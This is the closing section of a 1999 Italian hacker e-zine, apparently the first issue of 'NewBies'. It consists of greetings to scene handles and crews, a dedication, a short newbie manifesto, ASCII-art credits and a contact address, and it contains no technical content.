ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ora che siamo arrivati alla fine di questa e-zine volevo solo salutare alcune persone:
zerocool, AX1S, w00w00, ulntwh99, |lucio, kalidor, Dante Alighieri, Blum, |O2|, Biavo
darkside, SpiritoZ, fusyllo, XsX, grays, Ap, Ja[3]cK, overmars, w0rf, cavallo, pigpen,
Ron|n, tizio, /sPIRIT/, vecna, Dark Schnaider, linbus, vulcan, crusade3r, bricciolo,
lord destruction, grays, spindoc , Ron|n, claytonu2, KaOsS, quilecool, icemaze, XsX,
crazy crom, DrShade, Cyrus The Virus, ChEm-BoY, {D4m4g3~m4n}, lord shinva, lordjoker,
_p0nic0_, ghimlet, pigreco, biavo, andrea, sentenza ,quelli di BFI (grandi!), quelli
di Spaghetti Phreaker (mitici!), quelli di tutte le e-zine italiane che esistono ma
delle quali ignoro l'esistenza (gnurant...),quelli della crew RAVENLOFT tra cui DeLtAfOx
^acidburn, rafcrash, ]BoNzO[, vito, daguerra e quelli della crew TRH Tirol, D4d3z, Dudez,
m4w, 0V3RR1D3, L0RD^BYTE, Acid, il gruppo Spippolatori (SPP) con Master, RigoR MorteM,
e gli altri del (l'ancora esistente nonostante l'attacco in massa di noi newbies...
senza pieta'...) ng ahccc Teresa Luan Canis, X-Hacker, Harlock, Misha, ChRoMe,
ADaM, F14m3r, La Duchessa con l'Ermellino, Brigante, Fritz, The Duke, Buttha, neverin,
Azathoth, Nebbia, Red Owl, 3eGIN^NeR, Alby, Yota, NighTiger, Black Baron, NO SPAM,
Mr Good Trips, Macchia Nera, Kernel, Meimi, GekoVamp, Interbusiness, MasteR_OnE,
Francesco Mapelli, AntoMar, erGoline, SirPsychioSexy, DR. SCHaFauSeN, Newbie 1.0,
Cyberlele, tutti quelli del mitico it.comp.sicurezza tra cui Leonardo Serni, Kernel,
Giglio, Marco d'Itri, Firebeam, Krmel, invy, Ataru Moroboshi, Marco d'Itri e gli altri
di it.comp.sicurezza.virus, che purtroppo anche se scarico sempre riesco a leggere
poche volte :(( Se vi ho dimenticato be....mi rifaro' la prox volta. ø|^__^|ø

Ps: dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato quest'avventura
e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te fratello.
_--={ ø(^__^)ø }=--_

Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma
non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la
stessa voglia di smanettare e di capire.
+++Illo N0bodY88+++ January 16, 1999

Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti
x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente
vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete
mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri
immondi .... Come sono buono eh..

Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me , ma
almeno aspettate che abbia fermato tutti i lamer di questo universo , dopo
tutto non siamo tutti uguali
ZeroCool
ah vi lascio con una domanda fondamentale x la vostra vita : che ore sono e
perche' non sono gia' andato a ronfare , mha forse per scrivere ste cazz di 3
righe ...?

_ _ ____ _
| \ | | _____ _| __ )(_) ___ ___
| \| |/ _ \ \ /\ / / _ \| |/ _ Y __|
| |\ | __/\ V V /| |_) | | __|__ \
|_| \_|\___| \_/\_/ |____/|_|\___|___/

Webmaster by ---------> ZeroCool & Kalidor
E-zine by ------------> N0bodY88 & ZeroCool
Ascii by -------------> N0bodY88
Loghi NewBies by -----> RigoR MorteM

Byez a tutti questo 1ø num della e-zine e' finito, se volete commentare la e-zine,
aiutarci mandandoci i vs articoli x pubblicarli sui num. prossimi (se...ehehe),
scrivete a n0body88@freemail.it.

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT